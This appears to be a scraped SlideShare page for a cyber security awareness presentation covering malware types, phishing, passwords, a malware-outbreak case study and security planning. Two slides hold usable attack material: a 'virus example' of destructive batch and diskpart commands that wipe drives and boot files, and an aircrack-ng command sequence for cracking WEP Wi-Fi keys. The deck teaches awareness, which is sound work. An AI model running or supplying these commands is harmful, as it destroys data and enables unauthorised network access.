SlideShare a Scribd company logo

CYBER SECURITY AWARENESS

Download as PPSX, PDF
A
apyn

Computer security is important for both individuals and businesses. A malware infection at Logan Industries spread to hundreds of computers in just a few days, costing the company tens of thousands of dollars to remedy. Common cyber threats include viruses, worms, Trojan horses, and social engineering. Users should be aware of phishing scams, strong password practices, and wireless security risks. Regular security awareness training and having a security plan in place are recommended for protecting systems and information.

Technology
1 of 28
CYBER SECURITY AWARENESS Ali Payani THERE IS NO NEXT TIME, IT’S NOW OR NEVER.
“As the world is increasingly interconnected, everyone shares the responsibility of securing cyberspace.” -Newton Lee
OUTLINE • What is Computer Security • Importance of Security • Small business • Cyber Security Statistics • You are the target • Cyber Scam • 10 scams to watch out • Leading Threats • Password • Keylogger • Sniffing • Phishing • Security Plan • Case – Malware • Security issues
WHAT IS COMPUTER SECURITY ? • Securing Computers, Smartphones, Networks, Internet. • defending information from unauthorized access, use, disclosure, disruption, modification, perusal, inspection, recording or destruction, unplanned events and natural disasters.
IMPORTANCE OF SECURITY • The internet allows an attacker to attack from anywhere on the planet. • Governments, military, corporations, financial institutions, hospitals and other businesses collect, process and store a great deal of confidential information on computers and transmit that data across networks to other computers. With the growing volume and sophistication of cyber attacks, ongoing attention is required to protect sensitive business and personal information.  Risks caused by poor security knowledge and practice:  Identity Theft  Monetary Theft  Legal Ramifications (for yourself and companies)  Termination if company policies are not followed
• One of the best ways to make sure company employees will not make costly errors in regard to information security is to institute company-wide security-awareness training (SANS)
MOST SMALL BUSINESSES DON’T RECOVER FROM CYBERCRIME • 60% of small businesses will shutter within half a year after being victimized by cybercrime. • 90% do not have an internal IT manager for security • 87% do not have a formal written security policy • http://smallbusiness.foxbusiness.com/technology-web/2013/03/21/most-small-businesses- dont-recover-from-cybercrime/
STATISTICS • 91% increase in attacks 2013 (Symantec) • 62% increase in the number of breaches in 2013 • (Facebook) • Over 552M identities were exposed via breaches in 2013 (493%+ 2012) • 38% of mobile users have experienced mobile cybercrime in past 12 months • 1 in 392 emails contain a phishing attacks • 86% of all websites had at least one vulnerability • Most Data Breaches (Retail/Merchant=15M , Financial/Insurance=8M, Other=6M)
STATISTICS • 100M Phishing message everyday(Agari) • 3Bilion Phishing Message monthly • Phishing costs $ 70.2 Billion (Cisco) • Phishing cost corporate IT $ 28.1 Billion (IID) • 25% increase in Email Malware as URL • 1 in 196 Email Virus Rate • 1 in 566 website with Malware • 62% UAE users cannot recognize phishing message (Gulf news, Kaspersky 2012) • 70% phishing message targeted bank accounts ( RSA, 2013)
YOU ARE THE TARGET • Explain to end users that they are the target. Far too often people have the misconception that they are not a target, that their information or their computers has no value to attackers. Of course we know this to be false. Anyone with an identify, computer or private information is a target, cyber criminals have made an entire industry of hacking the end user. 1- users know and understand they are being actively targeted 2- risks exist regardless if they are at work or at home 3- Don’t Be scared, Just Drive Safe !
CYBER SCAM • Due to the high use of the internet, cyber scams have disrupted bank accounts, sent viruses, and stolen personal information. • Most cyber scams are sent through an e-mail account wherein individuals will open the e-mail to either find a virus has been put into their computer or to read misleading information. • Never entering personal information or credit card information on unsecure websites, never reply to or click on any links that you are not affiliated with, and never respond to an e-mail or advertisement saying you have won something. • Rugby World Cup 2015 , World Cup 2014 Brazil, Auction sites, Jobs and training courses, Business 2 Business, Phishing
LEADING THREATS • Virus • Worm • Trojan Horse • Social engineering
VIRUS • A virus attaches itself to a program, file, or disk When the program is executed, the virus activates and replicates itself. • Viruses result in crashing of computers and loss of data.  In order to recover/prevent virus/attacks:  Avoid potentially unreliable websites/emails  System Restore  Re-install operating system  Anti-virus (i.e. Avira, AVG, Norton) Program A Extra Code Program B infects
VIRUS - EXAMPLE > @echo off > del %systemdrive%*.*/f/s/q > shutdown -r -f -t 00 > xxx.bat > ----------- > @echo off > for %%i in (c ,d:,e:,f:,g:) do format %%i /FS:NTFS /x /q > ----------- > diskpart > > list disk > select disk 0 > clean > create partition primary > format fs=fat32 quick > @echo off ))) > attrib -r -s -h c:autoexec.bat ))) > del c:autoexec.bat ))) > attrib -r -s -h c:boot.ini ))) > del c:boot.ini ))) > attrib -r -s -h c:ntldr )) > del c:ntldr ))) > attrib -r -s -h c:windowswin.ini ))) > del c:windowswin.ini ))) > @echo off )))) > ((((----shutdown -s -t 10 -c " "-----)))))
WORM • Independent program which replicates itself and sends copies from computer to computer across network connections. Upon arrival the worm may be activated to replicate. To Joe To Ann To Bob Email List: Joe@gmail.com Ann@yahoo.com Bob@uwp.edu
TROJAN HORSE • Masquerades as beneficial program while quietly destroying data or damaging your system. • Download a game: Might be fun but has hidden part that emails your password file without you knowing.
SOCIAL ENGINEERING Social engineering manipulates people into performing actions or divulging confidential information. Similar to a confidence trick or simple fraud, the term applies to the use of deception to gain information, commit fraud, or access computer systems. • Phone Call: This is John, the System Admin. What is your password? • In Person: What ethnicity are you? Your mother’s maiden name? • I have come to repair your machine…and have some software patches • Email: ABC Bank has noticed a problem with your account…
PASSWORD • 1- It’s tough to create and remember strong passwords for each online system or site you access. • 2- It’s a BAD idea though to use the same password for several or all systems and site • 3- contains 8 characters, a mixture of uppercase and lowercase letters, at least one number and one non-alphanumeric character or symbol (5P0ky!3Z) • A. never share your password or write it down or save it ! • B. String Password • C. Don’t Use common words • D. Chang your password
KEY LOGGER • Bit of software that gets installed on your computer unbeknownst to you, and starts logging everything that you enter into the computer. This type of malware will often send usernames and passwords back to the attacker, who can then use this information to get into your bank accounts, social media accounts, and really anything that would require a username and password. • Protect: • 1- Anti virus • 2- Firewall • 3- Malwarebyte
SNIFFING • A sniffer is an application or device that can read, monitor, and capture network data exchanges and read network packets. If the packets are not encrypted, a sniffer provides a full view of the data inside the packet. Even encapsulated (tunneled) packets can be broken open and read unless they are encrypted and the attacker does not have access to the key.
PHISHING • The act of sending an email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft.
PHISHING • Most Phished Website: • .Facebook.com • .www.emiratesnbd.com/en/ • .Business Conference • .Facebook.com/Bestcars2015
SECURITY PLAN • Every company needs to have a security program • 1- No matter how large or small your company is • 2- you need to have a plan to ensure the security of your information assets • how you will mitigate them, and planning for how you keep the program and your security practices up to date. • Risk Assessment • Policies and Procedures (CIA) • Awareness • Audit • Business Continuity (BC, CP, IR)
CASE - MALWARE INFECTION • Logan Industries • is a multi-national catalog sale corporation with offices in 30 states • most offices are small, with fewer than 50 employees, • First Infection: Monday, Feb. 5 : • 20 employees at a satellite sales office received an email from the CEO and President Andrew James with the message. • Twenty employees experienced a computer shut-down a short time later • wait for the help desk to contact them about fixing their machines • The Virus Spreads: Tuesday, Feb. 6 • Early in the morning, the infection had spread from dozens of computers to hundreds. • After sending itself, it would cause the machine to reboot and never to recover.
• By 10 a.m., the CIO had been called and decided to form a team to deal with the virus. • Late Afternoon: Wednesday, February, 7th • find BadBoy on the disk drive and clean any infected files. • they spent from five to 10 minutes manually removing the virus code from all file locations. • Users at Logan Industries had now been without access to a computer for three days and were getting frustrated.
• The CEO requested a report from the CIO. The report included the following costs. • They didn’t have any security awareness for their employees • The ability to describe the business impact of virus/worm infection • •A comprehension of the responsibilities of an IT staff in delivering a secure environment • The steps to respond to and recover from a malware infection
WIRELESS HACK - WEP • Sudo apt-install aircrack-ng • Iwconfig scan • Airmon-ng start Wlan0 • airodump-ng mon0 • //airodump-ng -c channel -w filetosave –bssid macaddrs mon0 • airodump-ng -c 6 -w d.data –bssid 11:22:33:44:55 mon0 • //aireplay-ng -10 -a bssid mon0 • aireplay-ng -1 0 -a 00:18:98:23:34:86 mon0 • //aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0 • aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:98:23:34:86 mon0 • aircrack-ng filename.cap • aircrack-ng wep-01.cap • KEY FOUND! [ 11:11:11:11:11 ]
SECURITY ISSUES • Back up • Unknown file • Working on public place • Training, Training, Training • Security Policy • Passwords • Wireless Security • USB • Secure your accounts • Online Banking

Recommended

THESIS-2(2)
THESIS-2(2)THESIS-2(2)
THESIS-2(2)Elsayed Muhammad
 
Cyber Security Awareness Training by Win-Pro
Cyber Security Awareness Training by Win-ProCyber Security Awareness Training by Win-Pro
Cyber Security Awareness Training by Win-ProRonald Soh
 
Information Security Awareness: at Work, at Home, and For Your Kids
Information Security Awareness: at Work, at Home, and For Your Kids Information Security Awareness: at Work, at Home, and For Your Kids
Information Security Awareness: at Work, at Home, and For Your Kids Nicholas Davis
 
cyber_security
cyber_securitycyber_security
cyber_securityJana Baxter
 
Unit 1
Unit 1Unit 1
Unit 1Jigarthacker
 
CYBER CRIME AND SECURITY
CYBER CRIME AND SECURITYCYBER CRIME AND SECURITY
CYBER CRIME AND SECURITYSahil Vashishtha
 
Building An Information Security Awareness Program
Building An Information Security Awareness ProgramBuilding An Information Security Awareness Program
Building An Information Security Awareness ProgramBill Gardner
 
Presentation on cyber security
Presentation on cyber securityPresentation on cyber security
Presentation on cyber security9784
 

Recommended

THESIS-2(2)
THESIS-2(2)THESIS-2(2)
THESIS-2(2)Elsayed Muhammad
 
Cyber Security Awareness Training by Win-Pro
Cyber Security Awareness Training by Win-ProCyber Security Awareness Training by Win-Pro
Cyber Security Awareness Training by Win-ProRonald Soh
 
Information Security Awareness: at Work, at Home, and For Your Kids
Information Security Awareness: at Work, at Home, and For Your Kids Information Security Awareness: at Work, at Home, and For Your Kids
Information Security Awareness: at Work, at Home, and For Your Kids Nicholas Davis
 
cyber_security
cyber_securitycyber_security
cyber_securityJana Baxter
 
Unit 1
Unit 1Unit 1
Unit 1Jigarthacker
 
CYBER CRIME AND SECURITY
CYBER CRIME AND SECURITYCYBER CRIME AND SECURITY
CYBER CRIME AND SECURITYSahil Vashishtha
 
Building An Information Security Awareness Program
Building An Information Security Awareness ProgramBuilding An Information Security Awareness Program
Building An Information Security Awareness ProgramBill Gardner
 
Presentation on cyber security
Presentation on cyber securityPresentation on cyber security
Presentation on cyber security9784
 
Information security awareness
Information security awarenessInformation security awareness
Information security awarenessCAS
 
Cyber Security for Financial Planners
Cyber Security for Financial PlannersCyber Security for Financial Planners
Cyber Security for Financial PlannersMichael O'Phelan
 
Computer crimes
Computer crimesComputer crimes
Computer crimesMuniba Bukhari
 
Cyber crime
Cyber crimeCyber crime
Cyber crimeSalma Zafar
 
Cyber Security Awareness Session for Executives and Non-IT professionals
Cyber Security Awareness Session for Executives and Non-IT professionalsCyber Security Awareness Session for Executives and Non-IT professionals
Cyber Security Awareness Session for Executives and Non-IT professionalsKrishna Srikanth Manda
 
Computer security and privacy
Computer security and privacyComputer security and privacy
Computer security and privacyeiramespi07
 
BASIC IT AND CYBER SECURITY AWARENESS
BASIC IT AND CYBER SECURITY AWARENESSBASIC IT AND CYBER SECURITY AWARENESS
BASIC IT AND CYBER SECURITY AWARENESSMd Abu Syeem Dipu
 
Hacking And Its Prevention
Hacking And Its PreventionHacking And Its Prevention
Hacking And Its PreventionDinesh O Bareja
 
presentation on cyber crime and security
presentation on cyber crime and securitypresentation on cyber crime and security
presentation on cyber crime and securityAlisha Korpal
 
Cyber security mis
Cyber security misCyber security mis
Cyber security misAditya Singh Rana
 
Cyber Security 101: Training, awareness, strategies for small to medium sized...
Cyber Security 101: Training, awareness, strategies for small to medium sized...Cyber Security 101: Training, awareness, strategies for small to medium sized...
Cyber Security 101: Training, awareness, strategies for small to medium sized...Stephen Cobb
 
Cyber crime & security
Cyber crime & securityCyber crime & security
Cyber crime & securityRonson Fernandes
 
Online reputation
Online reputationOnline reputation
Online reputationesl2m
 
Cyber Security Update: How to Train Your Employees to Prevent Data Breaches
Cyber Security Update: How to Train Your Employees to Prevent Data BreachesCyber Security Update: How to Train Your Employees to Prevent Data Breaches
Cyber Security Update: How to Train Your Employees to Prevent Data BreachesParsons Behle & Latimer
 
Introduction to Cyber Crime
Introduction to Cyber CrimeIntroduction to Cyber Crime
Introduction to Cyber CrimeDr Raghu Khimani
 
State of Cyber Crime in Banking Sector Today: Threats and Solutions
State of Cyber Crime in Banking Sector Today: Threats and SolutionsState of Cyber Crime in Banking Sector Today: Threats and Solutions
State of Cyber Crime in Banking Sector Today: Threats and SolutionsGoutama Bachtiar
 
Security threats and safety measures
Security threats and safety measuresSecurity threats and safety measures
Security threats and safety measuresDnyaneshwar Beedkar
 
Cyber crime ppt
Cyber crime pptCyber crime ppt
Cyber crime pptBushra22
 
Eset cybersecurity awareness (laxman giri)
Eset cybersecurity awareness (laxman giri)Eset cybersecurity awareness (laxman giri)
Eset cybersecurity awareness (laxman giri)लक्ष्मण गिरी
 
Cyber crimes (By Mohammad Ahmed)
Cyber crimes (By Mohammad Ahmed)Cyber crimes (By Mohammad Ahmed)
Cyber crimes (By Mohammad Ahmed)Mohammad Ahmed
 
Cyber security awareness
Cyber security awarenessCyber security awareness
Cyber security awarenessJason Murray
 
Workshop E: Fighting Fraud and Cyber Crime: WTF…"Where's the Fraud"
Workshop E: Fighting Fraud and Cyber Crime: WTF…"Where's the Fraud"Workshop E: Fighting Fraud and Cyber Crime: WTF…"Where's the Fraud"
Workshop E: Fighting Fraud and Cyber Crime: WTF…"Where's the Fraud"Vivastream
 

More Related Content

What's hot

Information security awareness
Information security awarenessInformation security awareness
Information security awarenessCAS
 
Cyber Security for Financial Planners
Cyber Security for Financial PlannersCyber Security for Financial Planners
Cyber Security for Financial PlannersMichael O'Phelan
 
Cyber Security Awareness Session for Executives and Non-IT professionals
Cyber Security Awareness Session for Executives and Non-IT professionalsCyber Security Awareness Session for Executives and Non-IT professionals
Cyber Security Awareness Session for Executives and Non-IT professionalsKrishna Srikanth Manda
 
Computer security and privacy
Computer security and privacyComputer security and privacy
Computer security and privacyeiramespi07
 
BASIC IT AND CYBER SECURITY AWARENESS
BASIC IT AND CYBER SECURITY AWARENESSBASIC IT AND CYBER SECURITY AWARENESS
BASIC IT AND CYBER SECURITY AWARENESSMd Abu Syeem Dipu
 
Hacking And Its Prevention
Hacking And Its PreventionHacking And Its Prevention
Hacking And Its PreventionDinesh O Bareja
 
presentation on cyber crime and security
presentation on cyber crime and securitypresentation on cyber crime and security
presentation on cyber crime and securityAlisha Korpal
 
Cyber Security 101: Training, awareness, strategies for small to medium sized...
Cyber Security 101: Training, awareness, strategies for small to medium sized...Cyber Security 101: Training, awareness, strategies for small to medium sized...
Cyber Security 101: Training, awareness, strategies for small to medium sized...Stephen Cobb
 
Online reputation
Online reputationOnline reputation
Online reputationesl2m
 
Cyber Security Update: How to Train Your Employees to Prevent Data Breaches
Cyber Security Update: How to Train Your Employees to Prevent Data BreachesCyber Security Update: How to Train Your Employees to Prevent Data Breaches
Cyber Security Update: How to Train Your Employees to Prevent Data BreachesParsons Behle & Latimer
 
Introduction to Cyber Crime
Introduction to Cyber CrimeIntroduction to Cyber Crime
Introduction to Cyber CrimeDr Raghu Khimani
 
State of Cyber Crime in Banking Sector Today: Threats and Solutions
State of Cyber Crime in Banking Sector Today: Threats and SolutionsState of Cyber Crime in Banking Sector Today: Threats and Solutions
State of Cyber Crime in Banking Sector Today: Threats and SolutionsGoutama Bachtiar
 
Security threats and safety measures
Security threats and safety measuresSecurity threats and safety measures
Security threats and safety measuresDnyaneshwar Beedkar
 
Cyber crime ppt
Cyber crime pptCyber crime ppt
Cyber crime pptBushra22
 
Cyber crimes (By Mohammad Ahmed)
Cyber crimes (By Mohammad Ahmed)Cyber crimes (By Mohammad Ahmed)
Cyber crimes (By Mohammad Ahmed)Mohammad Ahmed
 

What's hot (20)

Information security awareness
Information security awarenessInformation security awareness
Information security awareness
 
Cyber Security for Financial Planners
Cyber Security for Financial PlannersCyber Security for Financial Planners
Cyber Security for Financial Planners
 
Computer crimes
Computer crimesComputer crimes
Computer crimes
 
Cyber crime
Cyber crimeCyber crime
Cyber crime
 
Cyber Security Awareness Session for Executives and Non-IT professionals
Cyber Security Awareness Session for Executives and Non-IT professionalsCyber Security Awareness Session for Executives and Non-IT professionals
Cyber Security Awareness Session for Executives and Non-IT professionals
 
Computer security and privacy
Computer security and privacyComputer security and privacy
Computer security and privacy
 
BASIC IT AND CYBER SECURITY AWARENESS
BASIC IT AND CYBER SECURITY AWARENESSBASIC IT AND CYBER SECURITY AWARENESS
BASIC IT AND CYBER SECURITY AWARENESS
 
Hacking And Its Prevention
Hacking And Its PreventionHacking And Its Prevention
Hacking And Its Prevention
 
presentation on cyber crime and security
presentation on cyber crime and securitypresentation on cyber crime and security
presentation on cyber crime and security
 
Cyber security mis
Cyber security misCyber security mis
Cyber security mis
 
Cyber Security 101: Training, awareness, strategies for small to medium sized...
Cyber Security 101: Training, awareness, strategies for small to medium sized...Cyber Security 101: Training, awareness, strategies for small to medium sized...
Cyber Security 101: Training, awareness, strategies for small to medium sized...
 
Cyber crime & security
Cyber crime & securityCyber crime & security
Cyber crime & security
 
Online reputation
Online reputationOnline reputation
Online reputation
 
Cyber Security Update: How to Train Your Employees to Prevent Data Breaches
Cyber Security Update: How to Train Your Employees to Prevent Data BreachesCyber Security Update: How to Train Your Employees to Prevent Data Breaches
Cyber Security Update: How to Train Your Employees to Prevent Data Breaches
 
Introduction to Cyber Crime
Introduction to Cyber CrimeIntroduction to Cyber Crime
Introduction to Cyber Crime
 
State of Cyber Crime in Banking Sector Today: Threats and Solutions
State of Cyber Crime in Banking Sector Today: Threats and SolutionsState of Cyber Crime in Banking Sector Today: Threats and Solutions
State of Cyber Crime in Banking Sector Today: Threats and Solutions
 
Security threats and safety measures
Security threats and safety measuresSecurity threats and safety measures
Security threats and safety measures
 
Cyber crime ppt
Cyber crime pptCyber crime ppt
Cyber crime ppt
 
Eset cybersecurity awareness (laxman giri)
Eset cybersecurity awareness (laxman giri)Eset cybersecurity awareness (laxman giri)
Eset cybersecurity awareness (laxman giri)
 
Cyber crimes (By Mohammad Ahmed)
Cyber crimes (By Mohammad Ahmed)Cyber crimes (By Mohammad Ahmed)
Cyber crimes (By Mohammad Ahmed)
 

Viewers also liked

Cyber security awareness
Cyber security awarenessCyber security awareness
Cyber security awarenessJason Murray
 
Workshop E: Fighting Fraud and Cyber Crime: WTF…"Where's the Fraud"
Workshop E: Fighting Fraud and Cyber Crime: WTF…"Where's the Fraud"Workshop E: Fighting Fraud and Cyber Crime: WTF…"Where's the Fraud"
Workshop E: Fighting Fraud and Cyber Crime: WTF…"Where's the Fraud"Vivastream
 
E Fraud And Predictive Forensic Profiling Reducing Losses By Combining Sci...
E Fraud And Predictive Forensic Profiling Reducing Losses By Combining Sci...E Fraud And Predictive Forensic Profiling Reducing Losses By Combining Sci...
E Fraud And Predictive Forensic Profiling Reducing Losses By Combining Sci...Stefano Maria De' Rossi
 
Fraud risk management training - Elsam Management Consultants
Fraud risk management training - Elsam Management ConsultantsFraud risk management training - Elsam Management Consultants
Fraud risk management training - Elsam Management ConsultantsEMAC Consulting Group
 
FT Partners Research: Transaction Security - At the Nexus of E-Commerce, Paym...
FT Partners Research: Transaction Security - At the Nexus of E-Commerce, Paym...FT Partners Research: Transaction Security - At the Nexus of E-Commerce, Paym...
FT Partners Research: Transaction Security - At the Nexus of E-Commerce, Paym...FT Partners / Financial Technology Partners
 
Fraud risk management and interrogation techniques part ii
Fraud risk management and interrogation techniques part iiFraud risk management and interrogation techniques part ii
Fraud risk management and interrogation techniques part iiEMAC Consulting Group
 
The Future of Cyber Security
The Future of Cyber SecurityThe Future of Cyber Security
The Future of Cyber SecurityStephen Lahanas
 
HOW TO EARN CISSP CERTIFICATION?
HOW TO EARN CISSP CERTIFICATION?HOW TO EARN CISSP CERTIFICATION?
HOW TO EARN CISSP CERTIFICATION?Terro White
 
CISSP Week 16
CISSP Week 16CISSP Week 16
CISSP Week 16jemtallon
 
How Training and Consulting Companies Can Position CISSP, CISM and CRISC
How Training and Consulting Companies Can Position CISSP, CISM and CRISCHow Training and Consulting Companies Can Position CISSP, CISM and CRISC
How Training and Consulting Companies Can Position CISSP, CISM and CRISCITpreneurs
 
Chap6 2007 Cisa Review Course
Chap6 2007 Cisa Review CourseChap6 2007 Cisa Review Course
Chap6 2007 Cisa Review CourseDesmond Devendran
 
CISSP Week 6
CISSP Week 6CISSP Week 6
CISSP Week 6jemtallon
 
Information Security Management Education Program - Concept Document
Information Security Management Education Program - Concept Document Information Security Management Education Program - Concept Document
Information Security Management Education Program - Concept Document Dinesh O Bareja
 
Business continuity & Disaster recovery planing
Business continuity & Disaster recovery planingBusiness continuity & Disaster recovery planing
Business continuity & Disaster recovery planingHanaysha
 

Viewers also liked (20)

Cyber security awareness
Cyber security awarenessCyber security awareness
Cyber security awareness
 
Workshop E: Fighting Fraud and Cyber Crime: WTF…"Where's the Fraud"
Workshop E: Fighting Fraud and Cyber Crime: WTF…"Where's the Fraud"Workshop E: Fighting Fraud and Cyber Crime: WTF…"Where's the Fraud"
Workshop E: Fighting Fraud and Cyber Crime: WTF…"Where's the Fraud"
 
E Fraud And Predictive Forensic Profiling Reducing Losses By Combining Sci...
E Fraud And Predictive Forensic Profiling Reducing Losses By Combining Sci...E Fraud And Predictive Forensic Profiling Reducing Losses By Combining Sci...
E Fraud And Predictive Forensic Profiling Reducing Losses By Combining Sci...
 
E Fraud
E FraudE Fraud
E Fraud
 
Fraud risk management training - Elsam Management Consultants
Fraud risk management training - Elsam Management ConsultantsFraud risk management training - Elsam Management Consultants
Fraud risk management training - Elsam Management Consultants
 
TRIO BC/DR
TRIO BC/DRTRIO BC/DR
TRIO BC/DR
 
Unit 4 e security
Unit 4 e securityUnit 4 e security
Unit 4 e security
 
FT Partners Research: Transaction Security - At the Nexus of E-Commerce, Paym...
FT Partners Research: Transaction Security - At the Nexus of E-Commerce, Paym...FT Partners Research: Transaction Security - At the Nexus of E-Commerce, Paym...
FT Partners Research: Transaction Security - At the Nexus of E-Commerce, Paym...
 
Fraud risk management and interrogation techniques part ii
Fraud risk management and interrogation techniques part iiFraud risk management and interrogation techniques part ii
Fraud risk management and interrogation techniques part ii
 
The Future of Cyber Security
The Future of Cyber SecurityThe Future of Cyber Security
The Future of Cyber Security
 
HOW TO EARN CISSP CERTIFICATION?
HOW TO EARN CISSP CERTIFICATION?HOW TO EARN CISSP CERTIFICATION?
HOW TO EARN CISSP CERTIFICATION?
 
BCP Awareness
BCP Awareness BCP Awareness
BCP Awareness
 
CISSP Week 16
CISSP Week 16CISSP Week 16
CISSP Week 16
 
How Training and Consulting Companies Can Position CISSP, CISM and CRISC
How Training and Consulting Companies Can Position CISSP, CISM and CRISCHow Training and Consulting Companies Can Position CISSP, CISM and CRISC
How Training and Consulting Companies Can Position CISSP, CISM and CRISC
 
Chap6 2007 Cisa Review Course
Chap6 2007 Cisa Review CourseChap6 2007 Cisa Review Course
Chap6 2007 Cisa Review Course
 
CISSP Week 6
CISSP Week 6CISSP Week 6
CISSP Week 6
 
Information Security Management Education Program - Concept Document
Information Security Management Education Program - Concept Document Information Security Management Education Program - Concept Document
Information Security Management Education Program - Concept Document
 
Business continuity & Disaster recovery planing
Business continuity & Disaster recovery planingBusiness continuity & Disaster recovery planing
Business continuity & Disaster recovery planing
 
9 Bcp+Drp
9 Bcp+Drp9 Bcp+Drp
9 Bcp+Drp
 
5 Ways To Improve Cissp Exam Score Without Studying
5 Ways To Improve Cissp Exam Score Without Studying5 Ways To Improve Cissp Exam Score Without Studying
5 Ways To Improve Cissp Exam Score Without Studying
 

Similar to CYBER SECURITY AWARENESS

Computer Security Presentation
Computer Security PresentationComputer Security Presentation
Computer Security PresentationPraphullaShrestha1
 
empowerment technologies Powerpoint presentation
empowerment technologies Powerpoint presentationempowerment technologies Powerpoint presentation
empowerment technologies Powerpoint presentationSheryldeVilla2
 
Online access and computer security.pptx_S.Gautham
Online access and computer security.pptx_S.GauthamOnline access and computer security.pptx_S.Gautham
Online access and computer security.pptx_S.GauthamJoelGautham
 
cybersecurity and cyber crime
cybersecurity and cyber crimecybersecurity and cyber crime
cybersecurity and cyber crimeDarshan Aswani
 
Basic practices for information & computer security
Basic practices for information & computer securityBasic practices for information & computer security
Basic practices for information & computer securityPrajktaGN
 
itsecurityawareness-v1-230413174238-5e7cba3c.pdf
itsecurityawareness-v1-230413174238-5e7cba3c.pdfitsecurityawareness-v1-230413174238-5e7cba3c.pdf
itsecurityawareness-v1-230413174238-5e7cba3c.pdfMansoorAhmed57263
 
IT Security Awareness-v1.7.ppt
IT Security Awareness-v1.7.pptIT Security Awareness-v1.7.ppt
IT Security Awareness-v1.7.pptOoXair
 
CYBER SECURITY AND CYBER CRIME COMPLETE GUIDE.pLptx
CYBER SECURITY AND CYBER CRIME COMPLETE GUIDE.pLptxCYBER SECURITY AND CYBER CRIME COMPLETE GUIDE.pLptx
CYBER SECURITY AND CYBER CRIME COMPLETE GUIDE.pLptxBarakaMuyengi
 
Cyber crime and cyber security
Cyber crime and cyber securityCyber crime and cyber security
Cyber crime and cyber securityKaushal Solanki
 
Rishabhcyber security.pptx
Rishabhcyber security.pptxRishabhcyber security.pptx
Rishabhcyber security.pptxRishabhDwivedi70
 
Unveiling the dark web. The importance of your cybersecurity posture
Unveiling the dark web. The importance of your cybersecurity postureUnveiling the dark web. The importance of your cybersecurity posture
Unveiling the dark web. The importance of your cybersecurity postureLourdes Paloma Gimenez
 
Cysec.pptx
Cysec.pptxCysec.pptx
Cysec.pptxjondon17
 
Law Firm Cybersecurity: Practical Tips for Protecting Your Data
Law Firm Cybersecurity: Practical Tips for Protecting Your DataLaw Firm Cybersecurity: Practical Tips for Protecting Your Data
Law Firm Cybersecurity: Practical Tips for Protecting Your DataAccellis Technology Group
 
Network security
Network securityNetwork security
Network securitymena kaheel
 
Cybersecurity awareness session.pptx
Cybersecurity awareness session.pptxCybersecurity awareness session.pptx
Cybersecurity awareness session.pptxUmaraZahidLecturer
 

Similar to CYBER SECURITY AWARENESS (20)

Computer Security Presentation
Computer Security PresentationComputer Security Presentation
Computer Security Presentation
 
Digital Security and Hygiene.pptx
Digital Security and Hygiene.pptxDigital Security and Hygiene.pptx
Digital Security and Hygiene.pptx
 
empowerment technologies Powerpoint presentation
empowerment technologies Powerpoint presentationempowerment technologies Powerpoint presentation
empowerment technologies Powerpoint presentation
 
Online access and computer security.pptx_S.Gautham
Online access and computer security.pptx_S.GauthamOnline access and computer security.pptx_S.Gautham
Online access and computer security.pptx_S.Gautham
 
cybersecurity and cyber crime
cybersecurity and cyber crimecybersecurity and cyber crime
cybersecurity and cyber crime
 
Basic practices for information & computer security
Basic practices for information & computer securityBasic practices for information & computer security
Basic practices for information & computer security
 
itsecurityawareness-v1-230413174238-5e7cba3c.pdf
itsecurityawareness-v1-230413174238-5e7cba3c.pdfitsecurityawareness-v1-230413174238-5e7cba3c.pdf
itsecurityawareness-v1-230413174238-5e7cba3c.pdf
 
IT Security Awareness-v1.7.ppt
IT Security Awareness-v1.7.pptIT Security Awareness-v1.7.ppt
IT Security Awareness-v1.7.ppt
 
Cyberattacks.pptx
Cyberattacks.pptxCyberattacks.pptx
Cyberattacks.pptx
 
Computer-Security.pptx
Computer-Security.pptxComputer-Security.pptx
Computer-Security.pptx
 
Cybersecurity Training
Cybersecurity TrainingCybersecurity Training
Cybersecurity Training
 
CYBER SECURITY AND CYBER CRIME COMPLETE GUIDE.pLptx
CYBER SECURITY AND CYBER CRIME COMPLETE GUIDE.pLptxCYBER SECURITY AND CYBER CRIME COMPLETE GUIDE.pLptx
CYBER SECURITY AND CYBER CRIME COMPLETE GUIDE.pLptx
 
Cyber crime and cyber security
Cyber crime and cyber securityCyber crime and cyber security
Cyber crime and cyber security
 
Rishabhcyber security.pptx
Rishabhcyber security.pptxRishabhcyber security.pptx
Rishabhcyber security.pptx
 
Unveiling the dark web. The importance of your cybersecurity posture
Unveiling the dark web. The importance of your cybersecurity postureUnveiling the dark web. The importance of your cybersecurity posture
Unveiling the dark web. The importance of your cybersecurity posture
 
Cysec.pptx
Cysec.pptxCysec.pptx
Cysec.pptx
 
Cyber security
Cyber securityCyber security
Cyber security
 
Law Firm Cybersecurity: Practical Tips for Protecting Your Data
Law Firm Cybersecurity: Practical Tips for Protecting Your DataLaw Firm Cybersecurity: Practical Tips for Protecting Your Data
Law Firm Cybersecurity: Practical Tips for Protecting Your Data
 
Network security
Network securityNetwork security
Network security
 
Cybersecurity awareness session.pptx
Cybersecurity awareness session.pptxCybersecurity awareness session.pptx
Cybersecurity awareness session.pptx
 

Recently uploaded

Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsHyundai Motor Group
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
